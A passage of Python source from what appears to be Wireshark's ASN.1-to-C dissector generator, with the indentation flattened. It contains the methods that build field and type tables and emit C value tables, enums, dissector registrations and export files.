self.eth_type[nm]['attr'].update(self.conform.use_item('ETYPE_ATTR', nm))
for t in self.eth_type_ord:
bits = self.eth_type[t]['val'].eth_named_bits()
if (bits):
for (val, id) in bits:
self.named_bit.append({'name' : id, 'val' : val,
'ethname' : 'hf_%s_%s_%s' % (self.eproto, t, asn2c(id)),
'ftype' : 'FT_BOOLEAN', 'display' : '8',
'strings' : 'NULL',
'bitmask' : '0x'+('80','40','20','10','08','04','02','01')[val%8]})
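                    # Added note: ASN.1 numbers bit 0 as the most significant
                    # bit of the first octet, hence the descending mask table.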
if self.eth_type[t]['val'].eth_need_tree():
self.eth_type[t]['tree'] = "ett_%s_%s" % (self.eth_type[t]['proto'], t)
else:
self.eth_type[t]['tree'] = None
#--- register values from enums ------------
for t in self.eth_type_ord:
if (self.eth_type[t]['val'].eth_has_enum(t, self)):
self.eth_type[t]['val'].reg_enum_vals(t, self)
#--- value dependencies -------------------
for v in self.value_ord:
if isinstance (self.value[v]['value'], Value):
dep = self.value[v]['value'].get_dep()
else:
dep = self.value[v]['value']
if dep and dep in self.value:
self.value_dep.setdefault(v, []).append(dep)
#--- exports all necessary values
for v in self.value_ord:
if not self.value[v]['export']: continue
deparr = self.value_dep.get(v, [])
while deparr:
d = deparr.pop()
if not self.value[d]['import']:
if not self.value[d]['export']:
self.value[d]['export'] = EF_TYPE
deparr.extend(self.value_dep.get(d, []))
#--- values -------------------
for v in self.value_imp:
nm = asn2c(v)
self.eth_value[nm] = { 'import' : self.value[v]['import'],
'proto' : asn2c(self.value[v]['proto']),
'ref' : []}
self.value[v]['ethname'] = nm
for v in self.value_ord:
if (self.value[v]['ethname']):
continue
if (self.value[v]['no_emit']):
continue
nm = asn2c(v)
self.eth_value[nm] = { 'import' : None,
'proto' : asn2c(self.value[v]['proto']),
'export' : self.value[v]['export'], 'ref' : [v] }
self.eth_value[nm]['value'] = self.value[v]['value']
self.eth_value_ord.append(nm)
self.value[v]['ethname'] = nm
#--- fields -------------------------
for f in (self.pdu_ord + self.field_ord):
if len(f.split('/')) > 1 and f.split('/')[-1] == ITEM_FIELD_NAME: # Sequence/Set of type
nm = self.conform.use_item('FIELD_RENAME', '/'.join(f.split('/')[0:-1]), val_dflt=f.split('/')[-2]) + f.split('/')[-1]
else:
nm = f.split('/')[-1]
nm = self.conform.use_item('FIELD_RENAME', f, val_dflt=nm)
nm = asn2c(nm)
if (self.field[f]['pdu']):
nm += '_PDU'
if (not self.merge_modules or self.field[f]['pdu']['export']):
nm = self.eproto + '_' + nm
t = self.field[f]['type']
if t in self.type:
ethtype = self.type[t]['ethname']
else: # undefined type
ethtype = self.dummy_import_type(t)
ethtypemod = ethtype + self.field[f]['modified']
if nm in self.eth_hf:
if nm in self.eth_hf_dupl:
if ethtypemod in self.eth_hf_dupl[nm]:
nm = self.eth_hf_dupl[nm][ethtypemod]
self.eth_hf[nm]['ref'].append(f)
self.field[f]['ethname'] = nm
continue
else:
nmx = nm + ('_%02d' % (len(self.eth_hf_dupl[nm])))
self.eth_hf_dupl[nm][ethtype] = nmx
nm = nmx
else:
if (self.eth_hf[nm]['ethtype']+self.eth_hf[nm]['modified']) == ethtypemod:
self.eth_hf[nm]['ref'].append(f)
self.field[f]['ethname'] = nm
continue
else:
nmx = nm + '_01'
self.eth_hf_dupl[nm] = {self.eth_hf[nm]['ethtype']+self.eth_hf[nm]['modified'] : nm, \
ethtypemod : nmx}
nm = nmx
if (self.field[f]['pdu']):
self.eth_hfpdu_ord.append(nm)
else:
self.eth_hf_ord.append(nm)
fullname = 'hf_%s_%s' % (self.eproto, nm)
attr = self.eth_get_type_attr(self.field[f]['type']).copy()
attr.update(self.field[f]['attr'])
if (self.NAPI() and 'NAME' in attr):
attr['NAME'] += self.field[f]['idx']
attr.update(self.conform.use_item('EFIELD_ATTR', nm))
use_vals_ext = self.eth_type[ethtype].get('vals_ext')
if (use_vals_ext):
attr['DISPLAY'] += '|BASE_EXT_STRING'
self.eth_hf[nm] = {'fullname' : fullname, 'pdu' : self.field[f]['pdu'],
'ethtype' : ethtype, 'modified' : self.field[f]['modified'],
'attr' : attr.copy(),
'ref' : [f]}
self.field[f]['ethname'] = nm
if (self.dummy_eag_field):
# Prepending "dummy_" avoids matching checkhf.pl.
self.dummy_eag_field = 'dummy_hf_%s_%s' % (self.eproto, self.dummy_eag_field)
#--- type dependencies -------------------
(self.eth_type_ord1, self.eth_dep_cycle) = dependency_compute(self.type_ord, self.type_dep, map_fn = lambda t: self.type[t]['ethname'], ignore_fn = lambda t: self.type[t]['import'])
i = 0
while i < len(self.eth_dep_cycle):
t = self.type[self.eth_dep_cycle[i][0]]['ethname']
self.dep_cycle_eth_type.setdefault(t, []).append(i)
i += 1
#--- value dependencies and export -------------------
for v in self.eth_value_ord:
if self.eth_value[v]['export']:
self.eth_vexport_ord.append(v)
else:
self.eth_value_ord1.append(v)
#--- export tags, values, ... ---
for t in self.exports:
if t not in self.type:
continue
if self.type[t]['import']:
continue
m = self.type[t]['module']
if not self.Per():
if m not in self.all_tags:
self.all_tags[m] = {}
self.all_tags[m][t] = self.type[t]['val'].GetTTag(self)
if m not in self.all_type_attr:
self.all_type_attr[m] = {}
self.all_type_attr[m][t] = self.eth_get_type_attr(t).copy()
for v in self.vexports:
if v not in self.value:
continue
if self.value[v]['import']:
continue
m = self.value[v]['module']
if m not in self.all_vals:
self.all_vals[m] = {}
vv = self.value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
self.all_vals[m][v] = vv
#--- eth_vals_nm ------------------------------------------------------------
def eth_vals_nm(self, tname):
out = ""
if (not self.eth_type[tname]['export'] & EF_NO_PROT):
out += "%s_" % (self.eproto)
out += "%s_vals" % (tname)
return out
#--- eth_vals ---------------------------------------------------------------
def eth_vals(self, tname, vals):
out = ""
has_enum = self.eth_type[tname]['enum'] & EF_ENUM
use_ext = self.eth_type[tname]['vals_ext']
if (use_ext):
vals.sort(key=lambda vals_entry: int(vals_entry[0]))
if (not self.eth_type[tname]['export'] & EF_VALS):
out += 'static '
if (self.eth_type[tname]['export'] & EF_VALS) and (self.eth_type[tname]['export'] & EF_TABLE):
out += 'static '
out += "const value_string %s[] = {\n" % (self.eth_vals_nm(tname))
for (val, id) in vals:
if (has_enum):
vval = self.eth_enum_item(tname, id)
else:
vval = val
out += ' { %3s, "%s" },\n' % (vval, id)
out += " { 0, NULL }\n};\n"
if (use_ext):
out += "\nstatic value_string_ext %s_ext = VALUE_STRING_EXT_INIT(%s);\n" % (self.eth_vals_nm(tname), self.eth_vals_nm(tname))
return out
#--- eth_enum_prefix ------------------------------------------------------------
def eth_enum_prefix(self, tname, type=False):
out = ""
if (self.eth_type[tname]['export'] & EF_ENUM):
no_prot = self.eth_type[tname]['export'] & EF_NO_PROT
else:
no_prot = self.eth_type[tname]['enum'] & EF_NO_PROT
if (not no_prot):
out += self.eproto
if ((not self.eth_type[tname]['enum'] & EF_NO_TYPE) or type):
if (out): out += '_'
out += tname
if (self.eth_type[tname]['enum'] & EF_UCASE):
out = out.upper()
if (out): out += '_'
return out
#--- eth_enum_nm ------------------------------------------------------------
def eth_enum_nm(self, tname):
out = self.eth_enum_prefix(tname, type=True)
out += "enum"
return out
#--- eth_enum_item ---------------------------------------------------------------
def eth_enum_item(self, tname, ident):
out = self.eth_enum_prefix(tname)
out += asn2c(ident)
if (self.eth_type[tname]['enum'] & EF_UCASE):
out = out.upper()
return out
#--- eth_enum ---------------------------------------------------------------
def eth_enum(self, tname, vals):
out = ""
if (self.eth_type[tname]['enum'] & EF_DEFINE):
out += "/* enumerated values for %s */\n" % (tname)
for (val, id) in vals:
out += '#define %-12s %3s\n' % (self.eth_enum_item(tname, id), val)
else:
out += "typedef enum _%s {\n" % (self.eth_enum_nm(tname))
first_line = 1
for (val, id) in vals:
if (first_line == 1):
first_line = 0
else:
out += ",\n"
out += ' %-12s = %3s' % (self.eth_enum_item(tname, id), val)
out += "\n} %s;\n" % (self.eth_enum_nm(tname))
return out
#--- eth_bits ---------------------------------------------------------------
def eth_bits(self, tname, bits):
out = ""
out += "static const "
out += "asn_namedbit %(TABLE)s[] = {\n"
for (val, id) in bits:
out += ' { %2d, &hf_%s_%s_%s, -1, -1, "%s", NULL },\n' % (val, self.eproto, tname, asn2c(id), id)
out += " { 0, NULL, 0, 0, NULL, NULL }\n};\n"
return out
#--- eth_type_fn_h ----------------------------------------------------------
def eth_type_fn_h(self, tname):
out = ""
if (not self.eth_type[tname]['export'] & EF_TYPE):
out += 'static '
out += "int "
if (self.Ber()):
out += "dissect_%s_%s(gboolean implicit_tag _U_, tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_)" % (self.eth_type[tname]['proto'], tname)
elif (self.Per()):
out += "dissect_%s_%s(tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_)" % (self.eth_type[tname]['proto'], tname)
out += ";\n"
return out
#--- eth_fn_call ------------------------------------------------------------
def eth_fn_call(self, fname, ret=None, indent=2, par=None):
out = indent * ' '
if (ret):
if (ret == 'return'):
out += 'return '
else:
out += ret + ' = '
out += fname + '('
ind = len(out)
for i in range(len(par)):
if (i>0): out += ind * ' '
out += ', '.join(par[i])
if (i<(len(par)-1)): out += ',\n'
out += ');\n'
return out
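    # Illustrative (added):
    #   eth_fn_call('asn1_ctx_init', par=(('&asn1_ctx', 'ASN1_ENC_BER', 'TRUE', 'pinfo'),))
    # returns '  asn1_ctx_init(&asn1_ctx, ASN1_ENC_BER, TRUE, pinfo);\n'.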
#--- eth_type_fn_hdr --------------------------------------------------------
def eth_type_fn_hdr(self, tname):
out = '\n'
if (not self.eth_type[tname]['export'] & EF_TYPE):
out += 'static '
out += "int\n"
if (self.Ber()):
out += "dissect_%s_%s(gboolean implicit_tag _U_, tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_) {\n" % (self.eth_type[tname]['proto'], tname)
elif (self.Per()):
out += "dissect_%s_%s(tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_) {\n" % (self.eth_type[tname]['proto'], tname)
#if self.conform.get_fn_presence(tname):
# out += self.conform.get_fn_text(tname, 'FN_HDR')
#el
if self.conform.get_fn_presence(self.eth_type[tname]['ref'][0]):
out += self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_HDR')
return out
#--- eth_type_fn_ftr --------------------------------------------------------
def eth_type_fn_ftr(self, tname):
out = '\n'
#if self.conform.get_fn_presence(tname):
# out += self.conform.get_fn_text(tname, 'FN_FTR')
#el
if self.conform.get_fn_presence(self.eth_type[tname]['ref'][0]):
out += self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_FTR')
out += " return offset;\n"
out += "}\n"
return out
#--- eth_type_fn_body -------------------------------------------------------
def eth_type_fn_body(self, tname, body, pars=None):
out = body
#if self.conform.get_fn_body_presence(tname):
# out = self.conform.get_fn_text(tname, 'FN_BODY')
#el
if self.conform.get_fn_body_presence(self.eth_type[tname]['ref'][0]):
out = self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_BODY')
if pars:
try:
out = out % pars
except (TypeError):
pass
return out
#--- eth_out_pdu_decl ----------------------------------------------------------
def eth_out_pdu_decl(self, f):
t = self.eth_hf[f]['ethtype']
is_new = self.eth_hf[f]['pdu']['new']
out = ''
if (not self.eth_hf[f]['pdu']['export']):
out += 'static '
if (is_new):
out += 'int '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_);\n'
else:
out += 'void '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_);\n'
return out
#--- eth_output_hf ----------------------------------------------------------
def eth_output_hf (self):
if not len(self.eth_hf_ord) and not len(self.eth_hfpdu_ord) and not len(self.named_bit): return
fx = self.output.file_open('hf')
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
fx.write("%-50s/* %s */\n" % ("static int %s = -1; " % (self.eth_hf[f]['fullname']), self.eth_hf[f]['ethtype']))
if (self.named_bit):
fx.write('/* named bits */\n')
for nb in self.named_bit:
fx.write("static int %s = -1;\n" % (nb['ethname']))
if (self.dummy_eag_field):
fx.write("static int %s = -1; /* never registered */\n" % (self.dummy_eag_field))
self.output.file_close(fx)
#--- eth_output_hf_arr ------------------------------------------------------
def eth_output_hf_arr (self):
if not len(self.eth_hf_ord) and not len(self.eth_hfpdu_ord) and not len(self.named_bit): return
fx = self.output.file_open('hfarr')
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
t = self.eth_hf[f]['ethtype']
if self.remove_prefix and t.startswith(self.remove_prefix):
t = t[len(self.remove_prefix):]
name=self.eth_hf[f]['attr']['NAME']
try: # Python < 3
trantab = maketrans("- ", "__")
except:
trantab = str.maketrans("- ", "__")
name = name.translate(trantab)
namelower = name.lower()
tquoted_lower = '"' + t.lower() + '"'
# Try to avoid giving blurbs that give no more info than the name
if tquoted_lower == namelower or \
t == "NULL" or \
tquoted_lower.replace("t_", "") == namelower:
blurb = 'NULL'
else:
blurb = '"%s"' % (t)
attr = self.eth_hf[f]['attr'].copy()
if attr['TYPE'] == 'FT_NONE':
attr['ABBREV'] = '"%s.%s_element"' % (self.proto, attr['ABBREV'])
else:
attr['ABBREV'] = '"%s.%s"' % (self.proto, attr['ABBREV'])
if 'BLURB' not in attr:
attr['BLURB'] = blurb
fx.write(' { &%s,\n' % (self.eth_hf[f]['fullname']))
fx.write(' { %(NAME)s, %(ABBREV)s,\n' % attr)
fx.write(' %(TYPE)s, %(DISPLAY)s, %(STRINGS)s, %(BITMASK)s,\n' % attr)
fx.write(' %(BLURB)s, HFILL }},\n' % attr)
for nb in self.named_bit:
fx.write(' { &%s,\n' % (nb['ethname']))
fx.write(' { "%s", "%s.%s",\n' % (nb['name'], self.proto, nb['name']))
fx.write(' %s, %s, %s, %s,\n' % (nb['ftype'], nb['display'], nb['strings'], nb['bitmask']))
fx.write(' NULL, HFILL }},\n')
self.output.file_close(fx)
#--- eth_output_ett ---------------------------------------------------------
def eth_output_ett (self):
fx = self.output.file_open('ett')
fempty = True
#fx.write("static gint ett_%s = -1;\n" % (self.eproto))
for t in self.eth_type_ord:
if self.eth_type[t]['tree']:
fx.write("static gint %s = -1;\n" % (self.eth_type[t]['tree']))
fempty = False
self.output.file_close(fx, discard=fempty)
#--- eth_output_ett_arr -----------------------------------------------------
def eth_output_ett_arr(self):
fx = self.output.file_open('ettarr')
fempty = True
#fx.write(" &ett_%s,\n" % (self.eproto))
for t in self.eth_type_ord:
if self.eth_type[t]['tree']:
fx.write(" &%s,\n" % (self.eth_type[t]['tree']))
fempty = False
self.output.file_close(fx, discard=fempty)
#--- eth_output_export ------------------------------------------------------
def eth_output_export(self):
fx = self.output.file_open('exp', ext='h')
for t in self.eth_export_ord: # vals
if (self.eth_type[t]['export'] & EF_ENUM) and self.eth_type[t]['val'].eth_has_enum(t, self):
fx.write(self.eth_type[t]['val'].eth_type_enum(t, self))
if (self.eth_type[t]['export'] & EF_VALS) and self.eth_type[t]['val'].eth_has_vals():
if not self.eth_type[t]['export'] & EF_TABLE:
if self.eth_type[t]['export'] & EF_WS_DLL:
fx.write("WS_DLL_PUBLIC ")
else:
fx.write("extern ")
fx.write("const value_string %s[];\n" % (self.eth_vals_nm(t)))
else:
fx.write(self.eth_type[t]['val'].eth_type_vals(t, self))
for t in self.eth_export_ord: # functions
if (self.eth_type[t]['export'] & EF_TYPE):
if self.eth_type[t]['export'] & EF_EXTERN:
if self.eth_type[t]['export'] & EF_WS_DLL:
fx.write("WS_DLL_PUBLIC ")
else:
fx.write("extern ")
fx.write(self.eth_type_fn_h(t))
for f in self.eth_hfpdu_ord: # PDUs
if (self.eth_hf[f]['pdu'] and self.eth_hf[f]['pdu']['export']):
fx.write(self.eth_out_pdu_decl(f))
self.output.file_close(fx)
#--- eth_output_expcnf ------------------------------------------------------
def eth_output_expcnf(self):
fx = self.output.file_open('exp', ext='cnf')
fx.write('#.MODULE\n')
maxw = 0
for (m, p) in self.modules:
if (len(m) > maxw): maxw = len(m)
for (m, p) in self.modules:
fx.write("%-*s %s\n" % (maxw, m, p))
fx.write('#.END\n\n')
for cls in self.objectclass_ord:
if self.objectclass[cls]['export']:
cnm = cls
if self.objectclass[cls]['export'] & EF_MODULE:
cnm = "$%s$%s" % (self.objectclass[cls]['module'], cnm)
fx.write('#.CLASS %s\n' % (cnm))
maxw = 2
for fld in self.objectclass[cls]['val'].fields:
w = len(fld.fld_repr()[0])
if (w > maxw): maxw = w
for fld in self.objectclass[cls]['val'].fields:
repr = fld.fld_repr()
fx.write('%-*s %s\n' % (maxw, repr[0], ' '.join(repr[1:])))
fx.write('#.END\n\n')
if self.Ber():
fx.write('#.IMPORT_TAG\n')
for t in self.eth_export_ord: # tags
if (self.eth_type[t]['export'] & EF_TYPE):
fx.write('%-24s ' % self.eth_type[t]['ref'][0])
fx.write('%s %s\n' % self.eth_type[t]['val'].GetTag(self))
fx.write('#.END\n\n')
fx.write('#.TYPE_ATTR\n')
for t in self.eth_export_ord: # attributes
if (self.eth_type[t]['export'] & EF_TYPE):
tnm = self.eth_type[t]['ref'][0]
if self.eth_type[t]['export'] & EF_MODULE:
tnm = "$%s$%s" % (self.type[tnm]['module'], tnm)
fx.write('%-24s ' % tnm)
attr = self.eth_get_type_attr(self.eth_type[t]['ref'][0]).copy()
fx.write('TYPE = %(TYPE)-9s DISPLAY = %(DISPLAY)-9s STRINGS = %(STRINGS)s BITMASK = %(BITMASK)s\n' % attr)
fx.write('#.END\n\n')
self.output.file_close(fx, keep_anyway=True)
#--- eth_output_val ------------------------------------------------------
def eth_output_val(self):
fx = self.output.file_open('val', ext='h')
for v in self.eth_value_ord1:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
fx.write("#define %-30s %s\n" % (v, vv))
for t in self.eth_type_ord1:
if self.eth_type[t]['import']:
continue
if self.eth_type[t]['val'].eth_has_enum(t, self) and not (self.eth_type[t]['export'] & EF_ENUM):
fx.write(self.eth_type[t]['val'].eth_type_enum(t, self))
self.output.file_close(fx)
#--- eth_output_valexp ------------------------------------------------------
def eth_output_valexp(self):
if (not len(self.eth_vexport_ord)): return
fx = self.output.file_open('valexp', ext='h')
for v in self.eth_vexport_ord:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
fx.write("#define %-30s %s\n" % (v, vv))
self.output.file_close(fx)
#--- eth_output_types -------------------------------------------------------
def eth_output_types(self):
def out_pdu(f):
t = self.eth_hf[f]['ethtype']
is_new = self.eth_hf[f]['pdu']['new']
impl = 'FALSE'
out = ''
if (not self.eth_hf[f]['pdu']['export']):
out += 'static '
if (is_new):
out += 'int '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_) {\n'
else:
out += 'void '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_) {\n'
if (is_new):
out += ' int offset = 0;\n'
off_par = 'offset'
ret_par = 'offset'
else:
off_par = '0'
ret_par = None
if (self.Per()):
if (self.Aligned()):
aligned = 'TRUE'
else:
aligned = 'FALSE'
out += " asn1_ctx_t asn1_ctx;\n"
out += self.eth_fn_call('asn1_ctx_init', par=(('&asn1_ctx', 'ASN1_ENC_PER', aligned, 'pinfo'),))
if (self.Ber()):
out += " asn1_ctx_t asn1_ctx;\n"
out += self.eth_fn_call('asn1_ctx_init', par=(('&asn1_ctx', 'ASN1_ENC_BER', 'TRUE', 'pinfo'),))
par=((impl, 'tvb', off_par,'&asn1_ctx', 'tree', self.eth_hf[f]['fullname']),)
elif (self.Per()):
par=(('tvb', off_par, '&asn1_ctx', 'tree', self.eth_hf[f]['fullname']),)
else:
par=((),)
out += self.eth_fn_call('dissect_%s_%s' % (self.eth_type[t]['proto'], t), ret=ret_par, par=par)
if (self.Per() and is_new):
out += ' offset += 7; offset >>= 3;\n'
if (is_new):
out += ' return offset;\n'
out += '}\n'
return out
#end out_pdu()
fx = self.output.file_open('fn')
pos = fx.tell()
if (len(self.eth_hfpdu_ord)):
first_decl = True
for f in self.eth_hfpdu_ord:
if (self.eth_hf[f]['pdu'] and self.eth_hf[f]['pdu']['need_decl']):
if first_decl:
fx.write('/*--- PDUs declarations ---*/\n')
first_decl = False
fx.write(self.eth_out_pdu_decl(f))
if not first_decl:
fx.write('\n')
if self.eth_dep_cycle:
fx.write('/*--- Cyclic dependencies ---*/\n\n')
i = 0
while i < len(self.eth_dep_cycle):
t = self.type[self.eth_dep_cycle[i][0]]['ethname']
if self.dep_cycle_eth_type[t][0] != i: i += 1; continue
fx.write(''.join(['/* %s */\n' % ' -> '.join(self.eth_dep_cycle[i]) for i in self.dep_cycle_eth_type[t]]))
fx.write(self.eth_type_fn_h(t))
fx.write('\n')
i += 1
fx.write('\n')
for t in self.eth_type_ord1:
if self.eth_type[t]['import']:
continue
if self.eth_type[t]['val'].eth_has_vals():
if self.eth_type[t]['no_emit'] & EF_VALS:
pass
elif self.eth_type[t]['user_def'] & EF_VALS:
fx.write("extern const value_string %s[];\n" % (self.eth_vals_nm(t)))
elif (self.eth_type[t]['export'] & EF_VALS) and (self.eth_type[t]['export'] & EF_TABLE):
pass
else:
fx.write(self.eth_type[t]['val'].eth_type_vals(t, self))
if self.eth_type[t]['no_emit'] & EF_TYPE:
pass
elif self.eth_type[t]['user_def'] & EF_TYPE:
fx.write(self.eth_type_fn_h(t))
else:
fx.write(self.eth_type[t]['val'].eth_type_fn(self.eth_type[t]['proto'], t, self))
fx.write('\n')
if (len(self.eth_hfpdu_ord)):
fx.write('/*--- PDUs ---*/\n\n')
for f in self.eth_hfpdu_ord:
if (self.eth_hf[f]['pdu']):
if (f in self.emitted_pdu):
fx.write(" /* %s already emitted */\n" % (f))
else:
fx.write(out_pdu(f))
self.emitted_pdu[f] = True
fx.write('\n')
fempty = pos == fx.tell()
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_hnd -----------------------------------------------------
def eth_output_dis_hnd(self):
fx = self.output.file_open('dis-hnd')
fempty = True
for f in self.eth_hfpdu_ord:
pdu = self.eth_hf[f]['pdu']
if (pdu and pdu['reg'] and not pdu['hidden']):
dis = self.proto
if (pdu['reg'] != '.'):
dis += '.' + pdu['reg']
fx.write('static dissector_handle_t %s_handle;\n' % (asn2c(dis)))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_reg -----------------------------------------------------
def eth_output_dis_reg(self):
fx = self.output.file_open('dis-reg')
fempty = True
for f in self.eth_hfpdu_ord:
pdu = self.eth_hf[f]['pdu']
if (pdu and pdu['reg']):
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
dis = self.proto
if (pdu['reg'] != '.'): dis += '.' + pdu['reg']
fx.write(' %sregister_dissector("%s", dissect_%s, proto_%s);\n' % (new_prefix, dis, f, self.eproto))
if (not pdu['hidden']):
fx.write(' %s_handle = find_dissector("%s");\n' % (asn2c(dis), dis))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_tab -----------------------------------------------------
def eth_output_dis_tab(self):
fx = self.output.file_open('dis-tab')
fempty = True
for k in self.conform.get_order('REGISTER'):
reg = self.conform.use_item('REGISTER', k)
if reg['pdu'] not in self.field: continue
f = self.field[reg['pdu']]['ethname']
pdu = self.eth_hf[f]['pdu']
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
if (reg['rtype'] in ('NUM', 'STR')):
rstr = ''
if (reg['rtype'] == 'STR'):
rstr = 'string'
else:
rstr = 'uint'
if (pdu['reg']):
dis = self.proto
if (pdu['reg'] != '.'): dis += '.' + pdu['reg']
if (not pdu['hidden']):
hnd = '%s_handle' % (asn2c(dis))
else:
hnd = 'find_dissector("%s")' % (dis)
else:
hnd = '%screate_dissector_handle(dissect_%s, proto_%s)' % (new_prefix, f, self.eproto)
rport = self.value_get_eth(reg['rport'])
fx.write(' dissector_add_%s("%s", %s, %s);\n' % (rstr, reg['rtable'], rport, hnd))
elif (reg['rtype'] in ('BER', 'PER')):
roid = self.value_get_eth(reg['roid'])
fx.write(' %sregister_%s_oid_dissector(%s, dissect_%s, proto_%s, %s);\n' % (new_prefix, reg['rtype'].lower(), roid, f, self.eproto, reg['roidname']))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_syn_reg -----------------------------------------------------
def eth_output_syn_reg(self):
fx = self.output.file_open('syn-reg')
fempty = True
first_decl = True
for k in self.conform.get_order('SYNTAX'):
reg = self.conform.use_item('SYNTAX', k)
if reg['pdu'] not in self.field: continue
f = self.field[reg['pdu']]['ethname']
pdu = self.eth_hf[f]['pdu']
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
if first_decl:
fx.write(' /*--- Syntax registrations ---*/\n')
first_decl = False
            fx.write('  %sregister_ber_syntax_dissector(%s, proto_%s, dissect_%s_PDU);\n' % (new_prefix, k, self.eproto, reg['pdu']))
            fempty = False
self.output.file_close(fx, discard=fempty)
#--- eth_output_tables -----------------------------------------------------
def eth_output_tables(self):
for num in list(self.conform.report.keys()):
fx = self.output.file_open('table' + num)
for rep in self.conform.report[num]:
self.eth_output_table(fx, rep)
self.output.file_close(fx)
#--- eth_output_table -----------------------------------------------------
def eth_output_table(self, fx, rep):
if rep['type'] == 'HDR':
fx.write('\n')
if rep['var']:
var = rep['var']
var_list = var.split('.', 1)
cls = var_list[0]
del var_list[0]
flds = []
not_flds = []
sort_flds = []
for f in var_list:
if f[0] == '!':
not_flds.append(f[1:])
continue
if f[0] == '#':
flds.append(f[1:])
sort_flds.append(f)
continue
if f[0] == '@':
flds.append(f[1:])
sort_flds.append(f[1:])
continue
flds.append(f)
objs = {}
objs_ord = []
if (cls in self.oassign_cls):
for ident in self.oassign_cls[cls]:
obj = self.get_obj_repr(ident, flds, not_flds)
if not obj:
continue
obj['_LOOP'] = var
obj['_DICT'] = str(obj)
objs[ident] = obj
objs_ord.append(ident)
if (sort_flds):
# Sort identifiers according to the matching object in objs.
# The order is determined by sort_flds, keys prefixed by a
# '#' are compared numerically.
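                    # E.g. a loop variable "CLASS.#&id" collects field '&id'
                    # and sorts the objects by int(obj['&id']) (added,
                    # illustrative).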
def obj_key_fn(name):
obj = objs[name]
return list(
int(obj[f[1:]]) if f[0] == '#' else obj[f]
for f in sort_flds
)
objs_ord.sort(key=obj_key_fn)
for ident in objs_ord:
obj = objs[ident]
try:
text = rep['text'] % obj
except (KeyError):
raise sys.exc_info()[0]("%s:%s invalid key %s for information object %s of %s" % (rep['fn'], rep['lineno'], sys.exc_info()[1], ident, var))
fx.write(text)
else:
fx.write("/* Unknown or empty loop list %s */\n" % (var))
else:
fx.write(rep['text'])
if rep['type'] == 'FTR':
fx.write('\n')
#--- dupl_report -----------------------------------------------------
def dupl_report(self):
# types
tmplist = sorted(self.eth_type_dupl.keys())
for t in tmplist:
msg = "The same type names for different types. Explicit type renaming is recommended.\n"
msg += t + "\n"
for tt in self.eth_type_dupl[t]:
msg += " %-20s %s\n" % (self.type[tt]['ethname'], tt)
warnings.warn_explicit(msg, UserWarning, '', 0)
# fields
tmplist = list(self.eth_hf_dupl.keys())
tmplist.sort()
for f in tmplist:
msg = "The same field names for different types. Explicit field renaming is recommended.\n"
msg += f + "\n"
for tt in list(self.eth_hf_dupl[f].keys()):
msg += " %-20s %-20s " % (self.eth_hf_dupl[f][tt], tt)
msg += ", ".join(self.eth_hf[self.eth_hf_dupl[f][tt]]['ref'])
msg += "\n"
warnings.warn_explicit(msg, UserWarning, '', 0)
#--- eth_do_output ------------------------------------------------------------
def eth_do_output(self):
if self.dbg('a'):
print("\n# Assignments")
for a in self.assign_ord:
v = ' '
if (self.assign[a]['virt']): v = '*'
print(v, a)
print("\n# Value assignments")
for a in self.vassign_ord:
print(' ', a)
print("\n# Information object assignments")
for a in self.oassign_ord:
print(" %-12s (%s)" % (a, self.oassign[a].cls))
if self.dbg('t'):
print("\n# Imported Types")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.type_imp:
print("%-40s %-24s %-24s" % (t, self.type[t]['import'], self.type[t]['proto']))
print("\n# Imported Values")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.value_imp:
print("%-40s %-24s %-24s" % (t, self.value[t]['import'], self.value[t]['proto']))
print("\n# Imported Object Classes")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.objectclass_imp:
print("%-40s %-24s %-24s" % (t, self.objectclass[t]['import'], self.objectclass[t]['proto']))
print("\n# Exported Types")
print("%-31s %s" % ("Wireshark type", "Export Flag"))
print("-" * 100)
for t in self.eth_export_ord:
print("%-31s 0x%02X" % (t, self.eth_type[t]['export']))
print("\n# Exported Values")
print("%-40s %s" % ("Wireshark name", "Value"))
print("-" * 100)
for v in self.eth_vexport_ord:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
print("%-40s %s" % (v, vv))
print("\n# ASN.1 Object Classes")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.objectclass_ord:
print("%-40s " % (t))
print("\n# ASN.1 Types")
print("%-49s %-24s %-24s" % ("ASN.1 unique name", "'tname'", "Wireshark type"))
print("-" * 100)
for t in self.type_ord:
